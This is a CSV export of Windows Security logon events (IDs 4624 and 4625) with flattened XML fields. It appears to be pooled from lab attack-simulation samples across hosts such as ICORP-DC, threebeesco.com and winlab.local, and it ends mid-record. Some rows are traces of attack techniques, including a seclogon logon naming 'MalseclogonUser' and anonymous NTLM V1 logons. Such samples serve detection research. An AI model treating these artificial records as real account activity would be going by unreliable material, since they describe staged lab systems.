128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM 
V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 10113 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x2e4ce + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x38f87e + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1b90 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + l + o + %%1843 + 0x0 + %%1843 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982101 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x73b44c + 3 + Kerberos + Kerberos + - + E8C9AC4A-31FC-C37F-B4D7-B3217C608858 + - + - + 0 + 0x0 + - + ::1 + 64849 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.499428+04:00,1639331872.499428,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982097 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + 
S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738cf9 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50616 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.375084+04:00,1639331872.375084,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982092 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738ce4 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50614 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.366793+04:00,1639331872.366793,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982089 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738afd + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50613 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.313673+04:00,1639331872.313673,4624,lgrove,THREEBEESCO.COM,3,Kerberos,172.16.66.19,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982084 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + THREEBEESCO.COM + 0x738ae4 + 3 + Kerberos + Kerberos + - + DCED4BA6-CF24-37EF-0627-B0E4EED7F565 + - + - + 0 + 0x0 + - + 172.16.66.19 + 50609 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" 
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21373 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x82215a + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21371 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821f28 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21369 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + 
S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821aab + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21367 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x820d61 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63640 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 25049 + + + + + Security + alice.insecurebank.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x1d12916 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 127.0.0.1 + 59336 + %%1833 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171296 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aadb8 + 3 + Kerberos + Kerberos + - + 860D1189-6C67-C57B-59ED-C0676A052019 + - + - + 0 + 0x0 + - + ::1 + 62863 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:57.263194+04:00,1599047277.263194,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171295 + + + + + 
Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aad4a + 3 + Kerberos + Kerberos + - + 860D1189-6C67-C57B-59ED-C0676A052019 + - + - + 0 + 0x0 + - + ::1 + 62862 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:57.252932+04:00,1599047277.252932,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171294 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aa47f + 3 + Kerberos + Kerberos + - + 27FCE179-F80F-F6A6-7DF4-C247E783B072 + - + - + 0 + 0x0 + - + ::1 + 62860 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.959767+04:00,1599047268.959767,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171292 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + THREEBEESCO.COM + 0x21a8c9a + 3 + Kerberos + Kerberos + - + 467413FE-B054-D9AE-C758-B41105A3ECA9 + - + - + 0 + 0x0 + - + 172.16.66.142 + 60726 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.842119+04:00,1599047268.842119,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171291 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + THREEBEESCO.COM + 0x21a8c80 + 3 + Kerberos + Kerberos + - + 467413FE-B054-D9AE-C758-B41105A3ECA9 + - + - + 0 + 0x0 + - + 172.16.66.142 + 60728 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" 
+2020-09-02T15:47:48.823276+04:00,1599047268.823276,4624,a-jbrown,3B,3,NtLmSsp,172.16.66.142,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171290 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x21a8c68 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.142 + 60726 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-05-11T21:10:10.889320+04:00,1557594610.88932,4624,IEUser,IEWIN7,9,seclogo,::1,,IEWIN7,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 18206 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1371b + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1bbdce + 9 + seclogo + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x3c8 + C:\Windows\System32\svchost.exe + ::1 + 0 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 
00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 
+ - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 
0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - 
+ - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B 
+ 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 
0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 